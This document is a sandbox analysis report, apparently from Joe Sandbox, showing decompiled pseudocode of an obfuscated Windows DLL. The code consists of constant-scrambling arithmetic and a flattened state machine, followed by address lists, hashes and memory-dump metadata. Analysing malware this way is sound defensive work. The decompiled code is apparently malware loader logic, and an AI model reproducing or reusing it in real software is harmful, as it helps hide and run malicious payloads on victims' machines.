                          				signed int _t844;
                          				signed int _t845;
                          				signed int _t846;
                          				signed int _t847;
                          				signed int _t848;
                          				signed int _t849;
                          				signed int _t850;
                          				signed int _t851;
                          				signed int _t852;
                          				signed int _t853;
                          				signed int _t854;
                          				signed int _t855;
                          				signed int _t856;
                          				signed int _t857;
                          				signed int _t858;
                          				signed int _t859;
                          				signed int _t860;
                          				void* _t861;
                          				void* _t864;
                          				void* _t867;
                          				signed int _t870;
                          				unsigned int* _t871;
                          				void* _t875;
                          
                          				_t774 = __ecx;
                          				_t871 =  &_v576;
                          				_v296 = __edx;
                          				_v480 = __ecx;
                          				_v420 = 0x6e1d72;
                          				_v420 = _v420 << 5;
                          				_v420 = _v420 * 0x3c;
                          				_t864 = 0xffd9b77;
                          				_v420 = _v420 ^ 0x39dcd700;
                          				_v532 = 0x1f7a5f;
                          				_t845 = 0xe;
                          				_v532 = _v532 / _t845;
                          				_v532 = _v532 ^ 0x6f56ef0e;
                          				_v532 = _v532 >> 0xa;
                          				_v532 = _v532 ^ 0x001a3d41;
                          				_v508 = 0xe1e69b;
                          				_v508 = _v508 + 0x2215;
                          				_v508 = _v508 + 0xffff2958;
                          				_v508 = _v508 + 0xffffaa0c;
                          				_v508 = _v508 ^ 0x00efd475;
                          				_v540 = 0xcd1956;
                          				_v540 = _v540 | 0x45240a95;
                          				_t846 = 0x77;
                          				_v540 = _v540 * 0x18;
                          				_v540 = _v540 ^ 0x336e332d;
                          				_v540 = _v540 ^ 0xbd574949;
                          				_v484 = 0x334a44;
                          				_v484 = _v484 ^ 0x919eff65;
                          				_v484 = _v484 / _t846;
                          				_v484 = _v484 | 0x2d19544d;
                          				_v484 = _v484 ^ 0x2d3e50ce;
                          				_v436 = 0x66ccc0;
                          				_v436 = _v436 + 0xffffec65;
                          				_t847 = 0x52;
                          				_v436 = _v436 * 0x24;
                          				_v436 = _v436 ^ 0x0e7c9935;
                          				_v492 = 0x2c49e8;
                          				_v492 = _v492 << 6;
                          				_v492 = _v492 << 2;
                          				_v492 = _v492 + 0xffff7e7f;
                          				_v492 = _v492 ^ 0x2c4d1795;
                          				_v348 = 0xb21165;
                          				_v348 = _v348 >> 0xb;
                          				_v348 = _v348 ^ 0x000033e8;
                          				_v464 = 0x27371d;
                          				_v464 = _v464 / _t847;
                          				_v464 = _v464 + 0xc709;
                          				_v464 = _v464 ^ 0x00086d33;
                          				_v476 = 0xe8a891;
                          				_v476 = _v476 >> 0xf;
                          				_v476 = _v476 + 0xffff587a;
                          				_v476 = _v476 ^ 0xfffd6e16;
                          				_v568 = 0xc76fce;
                          				_v568 = _v568 + 0xbc5c;
                          				_v568 = _v568 * 3;
                          				_v568 = _v568 | 0x5aa2bc40;
                          				_v568 = _v568 ^ 0x5afa6d0d;
                          				_v456 = 0xcc33e1;
                          				_v456 = _v456 ^ 0x6317d795;
                          				_v456 = _v456 | 0x1eb23508;
                          				_v456 = _v456 ^ 0x7ff946e0;
                          				_v560 = 0xede4ef;
                          				_v560 = _v560 + 0xffffe679;
                          				_t848 = 0x70;
                          				_v560 = _v560 / _t848;
                          				_v560 = _v560 << 5;
                          				_v560 = _v560 ^ 0x0043644b;
                          				_v500 = 0x670a53;
                          				_v500 = _v500 | 0x71b65663;
                          				_t849 = 0x2b;
                          				_v500 = _v500 * 0x3d;
                          				_v500 = _v500 + 0xfb01;
                          				_v500 = _v500 ^ 0x27fbe352;
                          				_v460 = 0x5f6e6b;
                          				_v460 = _v460 << 0xe;
                          				_v460 = _v460 | 0xdb801e45;
                          				_v460 = _v460 ^ 0xdb911bcb;
                          				_v404 = 0x155fb3;
                          				_v404 = _v404 + 0x82cf;
                          				_v404 = _v404 | 0x7954f6f3;
                          				_v404 = _v404 ^ 0x79505431;
                          				_v364 = 0x6447e1;
                          				_v364 = _v364 << 4;
                          				_v364 = _v364 ^ 0x064cce00;
                          				_v452 = 0x93f6b7;
                          				_v452 = _v452 | 0x0efbc074;
                          				_v452 = _v452 * 0x74;
                          				_v452 = _v452 ^ 0xca274b72;
                          				_v516 = 0x2e9555;
                          				_v516 = _v516 * 0x4d;
                          				_v516 = _v516 ^ 0x52348c71;
                          				_v516 = _v516 + 0xffff65c2;
                          				_v516 = _v516 ^ 0x5c3ff1c5;
                          				_v556 = 0x4e7cf7;
                          				_v556 = _v556 * 0x30;
                          				_v556 = _v556 ^ 0xab1a74ca;
                          				_v556 = _v556 | 0x39490d7c;
                          				_v556 = _v556 ^ 0xbde6ca21;
                          				_v304 = 0x79a99e;
                          				_v304 = _v304 | 0x92bbf026;
                          				_v304 = _v304 ^ 0x92fabbf2;
                          				_v444 = 0xf2d903;
                          				_v444 = _v444 * 0x13;
                          				_v444 = _v444 << 3;
                          				_v444 = _v444 ^ 0x90370785;
                          				_v388 = 0xce947f;
                          				_v388 = _v388 + 0xf4e6;
                          				_v388 = _v388 + 0xffffe2fa;
                          				_v388 = _v388 ^ 0x00c891aa;
                          				_v440 = 0x3724ee;
                          				_v440 = _v440 ^ 0xc994252f;
                          				_v440 = _v440 + 0xffff9dbe;
                          				_v440 = _v440 ^ 0xc9a5a4c3;
                          				_v544 = 0x9c24f5;
                          				_v544 = _v544 >> 8;
                          				_v544 = _v544 * 0x12;
                          				_v544 = _v544 + 0xb91e;
                          				_v544 = _v544 ^ 0x0007bff8;
                          				_v448 = 0x5ce888;
                          				_v448 = _v448 / _t849;
                          				_v448 = _v448 ^ 0x9d1dcba1;
                          				_v448 = _v448 ^ 0x9d138551;
                          				_v552 = 0x5ae9b7;
                          				_v552 = _v552 + 0xffffcdd3;
                          				_v552 = _v552 >> 0xa;
                          				_v552 = _v552 >> 3;
                          				_v552 = _v552 ^ 0x000286f6;
                          				_v372 = 0x1cfcf8;
                          				_v372 = _v372 << 0x10;
                          				_v372 = _v372 ^ 0xfcf9df5b;
                          				_v572 = 0x7fff3;
                          				_v572 = _v572 << 3;
                          				_v572 = _v572 | 0xc07f6c1b;
                          				_t850 = 0x6c;
                          				_v572 = _v572 / _t850;
                          				_v572 = _v572 ^ 0x01c5e077;
                          				_v468 = 0xb8a28e;
                          				_v468 = _v468 >> 0xa;
                          				_t851 = 7;
                          				_v468 = _v468 * 0x38;
                          				_v468 = _v468 ^ 0x0004661e;
                          				_v472 = 0x1c4be2;
                          				_v472 = _v472 >> 0xb;
                          				_v472 = _v472 / _t851;
                          				_v472 = _v472 ^ 0x000b37fd;
                          				_v324 = 0x397321;
                          				_v324 = _v324 + 0x4649;
                          				_v324 = _v324 ^ 0x003dbcde;
                          				_v564 = 0x90a3d2;
                          				_v564 = _v564 >> 0xf;
                          				_v564 = _v564 | 0x55e281c1;
                          				_v564 = _v564 + 0xffff9c60;
                          				_v564 = _v564 ^ 0x55ec6797;
                          				_v524 = 0x36ce4e;
                          				_v524 = _v524 + 0x9321;
                          				_v524 = _v524 ^ 0x68577083;
                          				_v524 = _v524 + 0x842e;
                          				_v524 = _v524 ^ 0x686a3805;
                          				_v380 = 0xf92015;
                          				_t852 = 0x57;
                          				_v380 = _v380 * 0x31;
                          				_v380 = _v380 ^ 0x2faa62dc;
                          				_v428 = 0xf06949;
                          				_v428 = _v428 ^ 0xe190386e;
                          				_v428 = _v428 | 0xd7c767f0;
                          				_v428 = _v428 ^ 0xf7e62dec;
                          				_v316 = 0x53402;
                          				_v316 = _v316 ^ 0x1a7eacd5;
                          				_v316 = _v316 ^ 0x1a780dc3;
                          				_v396 = 0xea020b;
                          				_v396 = _v396 / _t852;
                          				_v396 = _v396 >> 7;
                          				_v396 = _v396 ^ 0x0007fa92;
                          				_v576 = 0x94f18;
                          				_v576 = _v576 + 0x323;
                          				_t853 = 0x5a;
                          				_v576 = _v576 / _t853;
                          				_v576 = _v576 >> 7;
                          				_v576 = _v576 ^ 0x0009d62c;
                          				_v340 = 0x5ab89e;
                          				_v340 = _v340 + 0xcec5;
                          				_v340 = _v340 ^ 0x005981b9;
                          				_v424 = 0xf4fb06;
                          				_v424 = _v424 << 0xf;
                          				_v424 = _v424 + 0x6e15;
                          				_v424 = _v424 ^ 0x7d84f79d;
                          				_v308 = 0xe5ad48;
                          				_v308 = _v308 + 0xffff809e;
                          				_v308 = _v308 ^ 0x00e6a4ab;
                          				_v432 = 0xc8665e;
                          				_v432 = _v432 | 0xb25d9dfb;
                          				_v432 = _v432 * 0x51;
                          				_v432 = _v432 ^ 0x9835fda6;
                          				_v536 = 0x3c612a;
                          				_v536 = _v536 ^ 0xe3614c8f;
                          				_v536 = _v536 + 0x89b2;
                          				_v536 = _v536 >> 3;
                          				_v536 = _v536 ^ 0x1c61cdd9;
                          				_v312 = 0xb1cab1;
                          				_v312 = _v312 + 0x5335;
                          				_v312 = _v312 ^ 0x00b6c298;
                          				_v332 = 0x3dadc5;
                          				_v332 = _v332 >> 0xf;
                          				_v332 = _v332 ^ 0x00096a38;
                          				_v320 = 0xd2cf6d;
                          				_t854 = 0x5e;
                          				_v320 = _v320 / _t854;
                          				_v320 = _v320 ^ 0x000f4fea;
                          				_v528 = 0xbc9a67;
                          				_t768 = 0x35;
                          				_v528 = _v528 / _t768;
                          				_v528 = _v528 ^ 0x531db0de;
                          				_v528 = _v528 << 2;
                          				_v528 = _v528 ^ 0x4c7ccc72;
                          				_v368 = 0x9c5377;
                          				_v368 = _v368 | 0xa0dcba47;
                          				_v368 = _v368 ^ 0xa0d1bf3f;
                          				_v416 = 0x1ec4a4;
                          				_t855 = 0x79;
                          				_v416 = _v416 * 0x28;
                          				_v416 = _v416 / _t855;
                          				_v416 = _v416 ^ 0x00072384;
                          				_v376 = 0x2ac77;
                          				_v376 = _v376 << 0xf;
                          				_v376 = _v376 ^ 0x563f0855;
                          				_v412 = 0x448f7a;
                          				_v412 = _v412 << 0xd;
                          				_v412 = _v412 >> 2;
                          				_v412 = _v412 ^ 0x24738c34;
                          				_v356 = 0xc97c1e;
                          				_v356 = _v356 ^ 0x373e9b5c;
                          				_v356 = _v356 ^ 0x37f1bea5;
                          				_v548 = 0xc08620;
                          				_t856 = 0x3e;
                          				_v548 = _v548 * 0x48;
                          				_v548 = _v548 >> 0xe;
                          				_v548 = _v548 + 0x8cd4;
                          				_v548 = _v548 ^ 0x00077c97;
                          				_v504 = 0x1bacca;
                          				_v504 = _v504 / _t856;
                          				_v504 = _v504 + 0xffff3533;
                          				_v504 = _v504 + 0xffffc69c;
                          				_v504 = _v504 ^ 0xfffb1415;
                          				_v512 = 0x4f44ee;
                          				_v512 = _v512 + 0x177f;
                          				_v512 = _v512 + 0xce0c;
                          				_v512 = _v512 << 2;
                          				_v512 = _v512 ^ 0x014cc697;
                          				_v360 = 0x8b661;
                          				_t857 = 0x1e;
                          				_v360 = _v360 / _t857;
                          				_v360 = _v360 ^ 0x000dc15c;
                          				_v520 = 0xb38031;
                          				_v520 = _v520 | 0xa1714482;
                          				_t858 = 0x36;
                          				_t870 = _v296;
                          				_v520 = _v520 * 0x52;
                          				_v520 = _v520 + 0xc23a;
                          				_v520 = _v520 ^ 0xe016b971;
                          				_v496 = 0x319ddd;
                          				_v496 = _v496 / _t858;
                          				_t859 = 0x3b;
                          				_t860 = _v296;
                          				_v496 = _v496 / _t859;
                          				_v496 = _v496 + 0xffffa02a;
                          				_v496 = _v496 ^ 0xfff3e4c0;
                          				_v352 = 0x3691e9;
                          				_t769 = _v296;
                          				_v352 = _v352 / _t768;
                          				_v352 = _v352 ^ 0x000e8b32;
                          				_v408 = 0x2ac6b;
                          				_v408 = _v408 * 0x5a;
                          				_v408 = _v408 << 9;
                          				_v408 = _v408 ^ 0xe13230fa;
                          				_v392 = 0x204939;
                          				_v392 = _v392 + 0x4ed4;
                          				_v392 = _v392 * 0x35;
                          				_v392 = _v392 ^ 0x06bd0f48;
                          				_v336 = 0x1179fc;
                          				_v336 = _v336 + 0xffff73d1;
                          				_v336 = _v336 ^ 0x0013f977;
                          				_v400 = 0xb07871;
                          				_v400 = _v400 >> 3;
                          				_v400 = _v400 | 0xc580b254;
                          				_v400 = _v400 ^ 0xc59d0b5c;
                          				_v344 = 0x9fe4dd;
                          				_v344 = _v344 << 0xe;
                          				_v344 = _v344 ^ 0xf932a85a;
                          				_v328 = 0xd2ff81;
                          				_v328 = _v328 ^ 0x82aa1598;
                          				_v328 = _v328 ^ 0x827d602f;
                          				_v488 = 0x92e76b;
                          				_v488 = _v488 | 0x6946c4e8;
                          				_v488 = _v488 + 0xbbca;
                          				_v488 = _v488 * 0x54;
                          				_v488 = _v488 ^ 0xbac9f786;
                          				_v384 = 0xafba80;
                          				_v384 = _v384 ^ 0x0a481803;
                          				_v384 = _v384 << 6;
                          				_v384 = _v384 ^ 0xb9e44209;
                          				while(1) {
                          					L1:
                          					_t707 = 0x9c71ab3;
                          					do {
                          						while(1) {
                          							L2:
                          							_t875 = _t864 - 0x86fed85;
                          							if(_t875 <= 0) {
                          								break;
                          							}
                          							__eflags = _t864 - _t707;
                          							if(__eflags == 0) {
                          								_push(_v432);
                          								_t770 = _t860 + _t870;
                          								_push(_v308);
                          								_push(0xd31808);
                          								_v292 = _t770;
                          								_t708 = E00D44244(_v340, _v424, __eflags);
                          								__eflags = _t770 - _t870;
                          								_t769 = E00D4E1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
                          								E00D4FECB(_t708, _v528, _v368, _v416, _v376);
                          								_t774 = _v480;
                          								_t871 =  &(_t871[0xe]);
                          								_t864 = 0x1bf95f7;
                          								_t707 = 0x9c71ab3;
                          								goto L31;
                          							}
                          							__eflags = _t864 - 0xe33788a;
                          							if(_t864 == 0xe33788a) {
                          								_t860 = 0x4000;
                          								_push(_t774);
                          								_push(_t774);
                          								_t758 = E00D3C5D8(0x4000);
                          								_t871 =  &(_t871[3]);
                          								_v300 = _t758;
                          								__eflags = _t758;
                          								if(__eflags == 0) {
                          									return _t758;
                          								}
                          								_t864 = 0x77316ed;
                          								L14:
                          								_t774 = _v480;
                          								while(1) {
                          									L1:
                          									_t707 = 0x9c71ab3;
                          									goto L2;
                          								}
                          							}
                          							__eflags = _t864 - 0xf34fc82;
                          							if(_t864 == 0xf34fc82) {
                          								_push(_t774);
                          								_push(_t774);
                          								_t860 = E00D4CCA0(4, 0x10);
                          								_push( &_v128);
                          								_push(_t860);
                          								_push(_v560);
                          								_t833 = 0xb;
                          								E00D3E404(_v456, _t833);
                          								_t864 = 0x5f37ccd;
                          								L13:
                          								_t871 =  &(_t871[7]);
                          								goto L14;
                          							}
                          							__eflags = _t864 - 0xfefbdda;
                          							if(_t864 == 0xfefbdda) {
                          								E00D52B09(_v328, _v300, _v488, _v384);
                          								return 0;
                          							}
                          							__eflags = _t864 - 0xffd9b77;
                          							if(__eflags != 0) {
                          								goto L31;
                          							}
                          							_t864 = 0x17d426e;
                          						}
                          						if(_t875 == 0) {
                          							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
                          							_push(_t774);
                          							_push(_t774);
                          							_t718 = E00D3C5D8(_t860);
                          							_t774 = _v480;
                          							_t870 = _t718;
                          							_t871 =  &(_t871[3]);
                          							__eflags = _t870;
                          							_t707 = 0x9c71ab3;
                          							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
                          							goto L2;
                          						}
                          						if(_t864 == 0x17d426e) {
                          							_push(_t774);
                          							_push(_t774);
                          							_t860 = E00D4CCA0(1, 8);
                          							_push( &_v288);
                          							_push(_t860);
                          							_push(_v492);
                          							_t832 = 9;
                          							E00D3E404(_v436, _t832);
                          							_t864 = 0xf34fc82;
                          							goto L13;
                          						}
                          						if(_t864 == 0x1bf95f7) {
                          							E00D4C9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
                          							_t774 = _v480;
                          							_t871 =  &(_t871[4]);
                          							_t864 = 0x7c1f8ac;
                          							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
                          							goto L1;
                          						}
                          						if(_t864 == 0x5f37ccd) {
                          							_t867 =  &_v256;
                          							_push(_t774);
                          							_push(_t774);
                          							_t836 = E00D4CCA0(8, 0x10);
                          							_t871 =  &(_t871[4]);
                          							_t732 = _v420;
                          							__eflags = _t732 - _t836;
                          							if(_t732 < _t836) {
                          								_t844 = _t836 - _t732;
                          								_t861 = _t867;
                          								_t786 = _t844 >> 1;
                          								__eflags = _t786;
                          								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
                          								asm("adc ecx, ecx");
                          								_t867 = _t867 + _t844 * 2;
                          								memset(_t861 + _t786, _t740, 0);
                          								_t871 =  &(_t871[6]);
                          								_t774 = 0;
                          							}
                          							_push(_t774);
                          							_push(_t774);
                          							_t737 = E00D4CCA0(8, 0x10);
                          							_push(_t867);
                          							_t860 = _t737;
                          							_push(_t860);
                          							_push(_v388);
                          							_t837 = 0xb;
                          							E00D3E404(_v444, _t837);
                          							_t864 = 0xe33788a;
                          							goto L13;
                          						}
                          						if(_t864 == 0x77316ed) {
                          							_push(_v472);
                          							_push(_v468);
                          							_push(_v572);
                          							_t742 = E00D4E1F8(0xd317a8, _v372, __eflags);
                          							_t871 =  &(_t871[3]);
                          							_push( &_v256);
                          							_push(_t742);
                          							_push(_t860);
                          							_push(_v300);
                          							 *((intOrPtr*)(E00D531AA(0xb00b1257, 0x44)))();
                          							E00D4FECB(_t742, _v324, _v564, _v524, _v380);
                          							_t864 = 0x86fed85;
                          							goto L13;
                          						}
                          						_t880 = _t864 - 0x7c1f8ac;
                          						if(_t864 != 0x7c1f8ac) {
                          							goto L31;
                          						}
                          						_push(_v520);
                          						_push(_v360);
                          						_push(0xd31778);
                          						_t750 = E00D33325( &_v256, E00D44244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
                          						E00D4FECB(_t747, _v392, _v336, _v400, _v344);
                          						_t752 = _v296;
                          						 *_t752 = _t870;
                          						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
                          						L10:
                          						return _v300;
                          						L31:
                          						__eflags = _t864 - 0xc7faa3a;
                          					} while (__eflags != 0);
                          					goto L10;
                          				}
                          			}
                          0x00d43400
                          0x00d4340b
                          0x00d43416
                          0x00d43421
                          0x00d4342c
                          0x00d43437
                          0x00d43442
                          0x00d4344d
                          0x00d43458
                          0x00d4346e
                          0x00d43475
                          0x00d4347d
                          0x00d43488
                          0x00d43490
                          0x00d4349c
                          0x00d4349f
                          0x00d434a3
                          0x00d434a8
                          0x00d434b0
                          0x00d434bb
                          0x00d434c6
                          0x00d434d1
                          0x00d434dc
                          0x00d434e4
                          0x00d434ef
                          0x00d434fa
                          0x00d43505
                          0x00d43510
                          0x00d4351b
                          0x00d43526
                          0x00d43539
                          0x00d43540
                          0x00d4354d
                          0x00d43555
                          0x00d4355d
                          0x00d43565
                          0x00d4356a
                          0x00d43572
                          0x00d4357d
                          0x00d43588
                          0x00d43593
                          0x00d4359e
                          0x00d435a6
                          0x00d435b1
                          0x00d435c5
                          0x00d435ca
                          0x00d435d3
                          0x00d435de
                          0x00d435ea
                          0x00d435ef
                          0x00d435f5
                          0x00d435fd
                          0x00d43602
                          0x00d4360a
                          0x00d43615
                          0x00d43620
                          0x00d4362b
                          0x00d4363e
                          0x00d43641
                          0x00d43653
                          0x00d4365a
                          0x00d43665
                          0x00d43670
                          0x00d43678
                          0x00d43683
                          0x00d4368e
                          0x00d43696
                          0x00d4369e
                          0x00d436a9
                          0x00d436b4
                          0x00d436bf
                          0x00d436ca
                          0x00d436d7
                          0x00d436da
                          0x00d436de
                          0x00d436e3
                          0x00d436eb
                          0x00d436f3
                          0x00d43703
                          0x00d43707
                          0x00d4370f
                          0x00d43717
                          0x00d4371f
                          0x00d43727
                          0x00d4372f
                          0x00d43737
                          0x00d4373c
                          0x00d43744
                          0x00d43756
                          0x00d43759
                          0x00d43760
                          0x00d4376d
                          0x00d43775
                          0x00d43784
                          0x00d43787
                          0x00d4378e
                          0x00d43792
                          0x00d4379a
                          0x00d437a2
                          0x00d437b2
                          0x00d437ba
                          0x00d437bf
                          0x00d437c6
                          0x00d437ca
                          0x00d437d2
                          0x00d437da
                          0x00d437ee
                          0x00d437f5
                          0x00d437fc
                          0x00d43807
                          0x00d4381a
                          0x00d43821
                          0x00d43829
                          0x00d43834
                          0x00d4383f
                          0x00d43852
                          0x00d43859
                          0x00d43864
                          0x00d4386f
                          0x00d4387a
                          0x00d43885
                          0x00d43890
                          0x00d43898
                          0x00d438a3
                          0x00d438ae
                          0x00d438b9
                          0x00d438c1
                          0x00d438cc
                          0x00d438d7
                          0x00d438e2
                          0x00d438ed
                          0x00d438f5
                          0x00d438fd
                          0x00d4390a
                          0x00d4390e
                          0x00d43916
                          0x00d43921
                          0x00d4392c
                          0x00d43934
                          0x00d4393f
                          0x00d4393f
                          0x00d4393f
                          0x00d43944
                          0x00d43944
                          0x00d43944
                          0x00d43944
                          0x00d4394a
                          0x00000000
                          0x00000000
                          0x00d43be6
                          0x00d43be8
                          0x00d43ca8
                          0x00d43caf
                          0x00d43cb2
                          0x00d43cc7
                          0x00d43ccc
                          0x00d43cd3
                          0x00d43cda
                          0x00d43d26
                          0x00d43d34
                          0x00d43d39
                          0x00d43d40
                          0x00d43d43
                          0x00d43d48
                          0x00000000
                          0x00d43d48
                          0x00d43bee
                          0x00d43bf4
                          0x00d43c6d
                          0x00d43c84
                          0x00d43c85
                          0x00d43c87
                          0x00d43c8c
                          0x00d43c8f
                          0x00d43c96
                          0x00d43c98
                          0x00d43a22
                          0x00d43a22
                          0x00d43c9e
                          0x00d43a8d
                          0x00d43a8d
                          0x00d4393f
                          0x00d4393f
                          0x00d4393f
                          0x00000000
                          0x00d4393f
                          0x00d4393f
                          0x00d43bf6
                          0x00d43bfc
                          0x00d43c36
                          0x00d43c37
                          0x00d43c41
                          0x00d43c4a
                          0x00d43c4b
                          0x00d43c4c
                          0x00d43c59
                          0x00d43c5a
                          0x00d43c5f
                          0x00d43a8a
                          0x00d43a8a
                          0x00000000
                          0x00d43a8a
                          0x00d43bfe
                          0x00d43c04
                          0x00d43d77
                          0x00000000
                          0x00d43d7e
                          0x00d43c0a
                          0x00d43c10
                          0x00000000
                          0x00000000
                          0x00d43c16
                          0x00d43c16
                          0x00d43950
                          0x00d43bb0
                          0x00d43bc1
                          0x00d43bc2
                          0x00d43bc4
                          0x00d43bc9
                          0x00d43bcd
                          0x00d43bcf
                          0x00d43bd7
                          0x00d43bd9
                          0x00d43bde
                          0x00000000
                          0x00d43bde
                          0x00d4395c
                          0x00d43b72
                          0x00d43b73
                          0x00d43b7d
                          0x00d43b86
                          0x00d43b87
                          0x00d43b88
                          0x00d43b95
                          0x00d43b96
                          0x00d43b9b
                          0x00000000
                          0x00d43b9b
                          0x00d43968
                          0x00d43b46
                          0x00d43b4b
                          0x00d43b52
                          0x00d43b55
                          0x00d43b5a
                          0x00000000
                          0x00d43b5a
                          0x00d43974
                          0x00d43a9d
                          0x00d43ab6
                          0x00d43ab7
                          0x00d43ac1
                          0x00d43ac3
                          0x00d43ac6
                          0x00d43acd
                          0x00d43acf
                          0x00d43ad1
                          0x00d43ad3
                          0x00d43adc
                          0x00d43adc
                          0x00d43ade
                          0x00d43ae0
                          0x00d43ae2
                          0x00d43ae5
                          0x00d43ae5
                          0x00d43ae5
                          0x00d43ae5
                          0x00d43afe
                          0x00d43aff
                          0x00d43b04
                          0x00d43b09
                          0x00d43b0a
                          0x00d43b0c
                          0x00d43b0d
                          0x00d43b1d
                          0x00d43b1e
                          0x00d43b23
                          0x00000000
                          0x00d43b23
                          0x00d43980
                          0x00d43a23
                          0x00d43a2c
                          0x00d43a33
                          0x00d43a3e
                          0x00d43a43
                          0x00d43a54
                          0x00d43a55
                          0x00d43a56
                          0x00d43a57
                          0x00d43a66
                          0x00d43a80
                          0x00d43a85
                          0x00000000
                          0x00d43a85
                          0x00d43986
                          0x00d4398c
                          0x00000000
                          0x00000000
                          0x00d43992
                          0x00d43996
                          0x00d439a5
                          0x00d439d6
                          0x00d439fb
                          0x00d43a00
                          0x00d43a0c
                          0x00d43a0e
                          0x00d43a11
                          0x00000000
                          0x00d43d4d
                          0x00d43d4d
                          0x00d43d4d
                          0x00000000
                          0x00d43d59

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
                          • API String ID: 0-3070105227
                          • Opcode ID: 467c08be84fc2cc41c251c7f8e3b7853fd6cb7f7f1a9464b25a7e399ba5f188f
                          • Instruction ID: def73845f1423b11ef4a68b941c450d48aa94697f67213e131337829b39df0d4
                          • Opcode Fuzzy Hash: 467c08be84fc2cc41c251c7f8e3b7853fd6cb7f7f1a9464b25a7e399ba5f188f
                          • Instruction Fuzzy Hash: 6A721E715083819BD3B8CF25C58AB9BFBE1BBC4314F10891DE6DA9A260D7B09949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (legend: Executed, Not Executed)
                          C-Code - Quality: 95%
                          			E00D33431(intOrPtr __ecx) {
                          				char _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				char* _v48;
                          				intOrPtr _v52;
                          				signed int _v56;
                          				intOrPtr _v60;
                          				signed int _v64;
                          				char _v68;
                          				intOrPtr _v72;
                          				char _v76;
                          				char _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				signed int _v212;
                          				signed int _v216;
                          				signed int _v220;
                          				signed int _v224;
                          				signed int _v228;
                          				signed int _v232;
                          				signed int _v236;
                          				signed int _v240;
                          				signed int _v244;
                          				signed int _v248;
                          				signed int _v252;
                          				signed int _v256;
                          				signed int _v260;
                          				signed int _v264;
                          				signed int _v268;
                          				signed int _v272;
                          				signed int _v276;
                          				signed int _v280;
                          				unsigned int _v284;
                          				signed int _v288;
                          				signed int _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				signed int _v312;
                          				signed int _v316;
                          				signed int _v320;
                          				signed int _v324;
                          				signed int _v328;
                          				signed int _v332;
                          				signed int _v336;
                          				signed int _v340;
                          				signed int _v344;
                          				signed int _v348;
                          				signed int _v352;
                          				signed int _v356;
                          				signed int _v360;
                          				signed int _v364;
                          				signed int _v368;
                          				signed int _v372;
                          				signed int _v376;
                          				signed int _v380;
                          				signed int _v384;
                          				signed int _v388;
                          				signed int _v392;
                          				signed int _v396;
                          				signed int _v400;
                          				signed int _v404;
                          				signed int _v408;
                          				signed int _v412;
                          				signed int _v416;
                          				signed int _v420;
                          				signed int _v424;
                          				signed int _v428;
                          				signed int _v432;
                          				signed int _v436;
                          				signed int _v440;
                          				signed int _v444;
                          				signed int _v448;
                          				void* _t880;
                          				void* _t883;
                          				intOrPtr _t884;
                          				intOrPtr _t891;
                          				void* _t892;
                          				signed int _t894;
                          				char _t897;
                          				void* _t905;
                          				intOrPtr _t918;
                          				void* _t919;
                          				intOrPtr _t925;
                          				intOrPtr _t927;
                          				void* _t929;
                          				signed int _t935;
                          				signed int _t936;
                          				signed int _t937;
                          				signed int _t938;
                          				signed int _t939;
                          				signed int _t940;
                          				signed int _t941;
                          				signed int _t942;
                          				signed int _t943;
                          				signed int _t944;
                          				signed int _t945;
                          				signed int _t946;
                          				signed int _t947;
                          				signed int _t948;
                          				signed int _t949;
                          				signed int _t950;
                          				signed int _t951;
                          				void* _t952;
                          				intOrPtr _t974;
                          				intOrPtr _t977;
                          				void* _t1017;
                          				intOrPtr _t1018;
                          				void* _t1038;
                          				intOrPtr _t1039;
                          				void* _t1041;
                          				void* _t1046;
                          				signed int* _t1048;
                          				signed int* _t1052;
                          				void* _t1054;
                          
                          				_t1048 =  &_v448;
                          				_v436 = 0x369131;
                          				_v436 = _v436 >> 0xc;
                          				_v72 = __ecx;
                          				_t1046 = 0;
                          				_t935 = 0x47;
                          				_v436 = _v436 / _t935;
                          				_t929 = 0xda5043f;
                          				_t936 = 0x5f;
                          				_v436 = _v436 * 0x17;
                          				_v436 = _v436 ^ 0x4d42455f;
                          				_v208 = 0xf6fdfa;
                          				_v208 = _v208 | 0x2cc981c8;
                          				_v208 = _v208 ^ 0x2cfffdfb;
                          				_v424 = 0xd0dd87;
                          				_v424 = _v424 << 0xd;
                          				_v424 = _v424 | 0x1c0753be;
                          				_v424 = _v424 << 0xb;
                          				_v424 = _v424 ^ 0xbf9df000;
                          				_v168 = 0x27916c;
                          				_v168 = _v168 << 0xc;
                          				_v168 = _v168 ^ 0x7916c000;
                          				_v112 = 0xb477a9;
                          				_v112 = _v112 << 0xb;
                          				_v112 = _v112 ^ 0xa3bd4800;
                          				_v220 = 0xe97999;
